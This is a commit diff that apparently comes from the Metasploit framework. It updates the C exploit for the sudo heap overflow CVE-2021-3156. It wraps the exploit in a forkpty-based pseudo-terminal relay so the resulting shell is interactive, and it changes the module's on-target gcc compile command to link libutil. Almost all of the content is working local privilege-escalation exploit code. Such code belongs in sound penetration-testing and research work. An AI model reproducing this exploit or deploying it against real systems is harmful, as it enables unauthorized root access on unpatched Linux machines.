Update the exploit C code to allocate it's own PTY

2024-09-25 10:48:31 +02:00 · 2021-02-02 17:10:23 -05:00 · 2021-02-02 17:10:23 -05:00 · b9413b4103
commit b9413b4103
parent 13dd9ac10e
2 changed files with 64 additions and 3 deletions
--- a/data/exploits/CVE-2021-3156/exploit.c
+++ b/data/exploits/CVE-2021-3156/exploit.c
@ -23,6 +23,12 @@
 #include <stdint.h>
 #include <unistd.h>
 #include <ctype.h>
+#include <pty.h>
+#include <termios.h>
+#include <fcntl.h>
+
+#include <sys/select.h>
+#include <sys/wait.h>

 // 512 environment variables should be enough for everyone
 #define MAX_ENVP 512
@ -37,7 +43,7 @@ typedef struct {
    uint32_t lc_all_len;
 } target_t;

-int main(int argc, char *argv[]) {
+int exploit(int argc, char *argv[]) {

    if (argc != 5) {
        return -1;
@ -53,7 +59,7 @@ int main(int argc, char *argv[]) {
    target->lc_all_len     = atoi(argv[4]);

    printf(
-        "using target: %s ['%s'] (%d, %d, %d, %d)\n",
+        "using target: %s '%s' (%d, %d, %d, %d)\n",
        target->target_name,
        target->sudoedit_path,
        target->smash_len_a,
@ -95,3 +101,58 @@ int main(int argc, char *argv[]) {
    execve(target->sudoedit_path, s_argv, s_envp);
    return 0;
 }
+
+int main(int argc, char *argv[]) {
+    int master;
+    pid_t pid;
+
+    pid = forkpty(&master, NULL, NULL, NULL);
+
+    if (pid < 0) {
+        printf("Failed to fork\n");
+        return -1;
+    } else if (pid == 0) {
+        if (ioctl(STDIN_FILENO, TIOCSCTTY, NULL) < 0) {
+            printf("ioctl() TIOCSCTTY failed\n");
+        }
+        return exploit(argc, argv);
+    }
+
+    struct termios tios;
+    tcgetattr(master, &tios);
+    tios.c_lflag &= ~(ECHO | ECHONL);
+    tcsetattr(master, TCSAFLUSH, &tios);
+
+    for (;;) {
+        fd_set          read_fd;
+        fd_set          write_fd;
+        fd_set          except_fd;
+
+        FD_ZERO(&read_fd);
+        FD_ZERO(&write_fd);
+        FD_ZERO(&except_fd);
+
+        FD_SET(master, &read_fd);
+        FD_SET(STDIN_FILENO, &read_fd);
+
+        select(master+1, &read_fd, &write_fd, &except_fd, NULL);
+
+        char input;
+        char output;
+
+        if (FD_ISSET(master, &read_fd))
+        {
+            if (read(master, &output, 1) != -1)
+                write(STDOUT_FILENO, &output, 1);
+            else
+                break;
+        }
+
+        if (FD_ISSET(STDIN_FILENO, &read_fd))
+        {
+            read(STDIN_FILENO, &input, 1);
+            write(master, &input, 1);
+        }
+    }
+    return 0;
+}
--- a/modules/exploits/linux/local/cve_2021_3156_sudo.rb
+++ b/modules/exploits/linux/local/cve_2021_3156_sudo.rb
@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Local

  def upload_and_compile(path, data)
    upload "#{path}.c", data
-    gcc_cmd = "gcc -o #{path} #{path}.c"
+    gcc_cmd = "gcc -o #{path} #{path}.c -lutil"
    if session.type.eql? 'shell'
      gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
    end